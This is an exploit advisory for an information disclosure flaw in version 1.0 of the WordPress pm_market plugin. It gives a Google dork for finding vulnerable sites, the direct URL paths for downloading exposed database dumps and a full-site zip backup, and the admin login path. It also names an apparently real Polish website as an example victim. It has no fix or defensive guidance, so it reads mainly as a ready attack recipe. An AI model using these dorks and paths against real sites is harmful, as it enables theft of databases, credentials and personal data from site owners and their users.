################################################################################################# # Exploit Title : WordPress pm_market Plugins 1.0 Database Backup Information Disclosure Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 30/11/2018 # Vendor Homepage : wordpress.org ~ power.com.pl # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.0 # Google Dorks : inurl:''/wp-content/plugins/pm_market/backup/'' + intext:Copyright A(c) Power Media S.A. site:pl # Exploit Risk : Medium # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/pm_market/backup/.... /wp-content/plugins/pm_market/backup/[YEAR]-[MONTH]-[DAY]/pm_market.sql /wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql /wp-content/plugins/pm_market/backup/2012-01-05/wordpress.sql /wp-content/plugins/pm_market/backup/2012-01-05/www.zip ################################################################################################# # Example Vulnerable Site => [+] klaster.kalisz.pl/wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################